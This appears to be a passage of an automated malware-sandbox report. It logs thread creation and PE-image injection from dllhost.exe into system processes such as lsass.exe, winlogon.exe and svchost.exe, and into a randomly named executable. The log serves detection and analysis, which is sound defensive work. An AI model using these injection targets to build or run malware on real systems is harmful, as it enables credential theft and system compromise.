Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7DEB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 92FE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 93102EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: C05B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FFD52EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1B952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F18C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1912EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 7EAE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E8752EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3052EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B212EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B212EBC

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 263841B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
